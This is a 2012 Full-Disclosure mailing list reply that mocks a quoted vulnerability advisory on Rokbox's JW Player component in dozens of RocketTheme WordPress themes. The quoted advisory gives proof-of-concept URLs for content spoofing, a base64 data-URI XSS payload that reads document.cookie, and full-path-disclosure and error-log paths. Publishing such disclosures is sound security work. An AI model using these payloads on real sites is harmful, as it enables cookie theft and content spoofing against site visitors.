[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] Multiple vulnerabilities in RocketTheme themes for WordPress
- To: MustLive <mustlive@xxxxxxxxxxxxxxxxxx>
- Subject: Re: [Full-disclosure] Multiple vulnerabilities in RocketTheme themes for WordPress
- From: Julius Kivimäki <julius.kivimaki@xxxxxxxxx>
- Date: Sun, 30 Dec 2012 00:54:43 +0200
Full path disclosure, vulnerability?
Ahahahahaha, good joke! You made my day.
2012/12/29 MustLive <mustlive@xxxxxxxxxxxxxxxxxx>
> Hello list!
>
> Earlier I've wrote to the list about multiple vulnerabilities in multiple
> themes for WordPress (http://seclists.org/fulldisclosure/2012/Dec/236). In
> that later I've mentioned 16 themes by RocketTheme (with Rokbox):
> Afterburner, Refraction, Solarsentinel, Mixxmag, Iridium, Infuse,
> Perihelion, Replicant2, Affinity, Nexus, Sentinel, Mynxx Vestnikp, Mynxx,
> Moxy, Terrantribune, Meridian.
>
> I've wrote about 14 themes + 2 variations of 2 themes by these developers,
> but they have 47 themes for WordPress in total. Among them only three are
> free, and all other themes from RocketTheme are paid ones (it's needed to
> buy subscription to the club to receive access to them). And Rokbox is
> bundled with all these themes, except Grunge, which have all
> earlier-mentioned vulnerabilities.
>
> So I inform you about multiple vulnerabilities in 33 new themes for
> WordPress, which are developed by RocketTheme (Rokbox's developers). These
> are Content Spoofing, Cross-Site Scripting, Full path disclosure and
> Information Leakage vulnerabilities.
>
> -------------------------
> Affected products:
> -------------------------
>
> In these 32 themes (in addition to previous 16) there are Cross-Site
> Scripting, Content Spoofing, Full path disclosure and Information Leakage
> vulnerabilities. And Grunge theme has FPD holes.
>
> These are the next themes by RocketTheme: Voxel, Diametric, Ionosphere,
> Clarion, Halcyon, Visage, Enigma, Momentum, Radiance, Camber, Reflex,
> Modulus, Nebulae, Entropy, Tachyon, Mercado, Maelstrom, Syndicate, Paradox,
> Hybrid, Omnicron, Zephyr, Panacea, Somaxiom, Juxta, Quantive, Crystalline,
> Kinetic, Dominion, Reaction, Akiraka, Novus and Grunge.
>
> Affected all versions of these themes for WordPress.
>
> Since August I've informed the developers many times concerning
> vulnerabilities in Rokbox and their themes with it.
>
> ----------
> Details:
> ----------
>
> Content Spoofing (WASC-12):
>
> In parameter file there can be set as video, as audio files.
>
> Swf-file of JW Player accepts arbitrary addresses in parameters file and
> image, which allows to spoof content of flash - i.e. by setting addresses
> of
> video (audio) and/or image files from other site.
>
>
> http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
>
> http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&image=1.jpg
>
> Content Spoofing (WASC-12):
>
> Swf-file of JW Player accepts arbitrary addresses in parameter config,
> which
> allows to spoof content of flash - i.e. by setting address of config file
> from other site (parameters file and image in xml-file accept arbitrary
> addresses). For loading of config file from other site it needs to have
> crossdomain.xml.
>
>
> http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?config=1.xml
>
> 1.xml
>
> <config>
> <file>1.flv</file>
> <image>1.jpg</image>
> </config>
>
> Content Spoofing (WASC-12):
>
>
> http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://site
>
> XSS (WASC-08):
>
>
> http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B
>
> Full path disclosure (WASC-13):
>
> In all these themes there is FPD in index.php
> (http://site/wordpress/wp-content/themes/rt_novus_wp/ and the same for
> other
> themes), which works at default PHP settings. Also potentially there are
> FPD
> in other php-files of these themes.
>
> Information Leakage (WASC-13):
>
> In some themes, similar to rt_mixxmag_wp, there can be error log with full
> paths.
>
> http://site/wordpress/wp-content/themes/rt_mixxmag_wp/js/rokbox/error_log
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/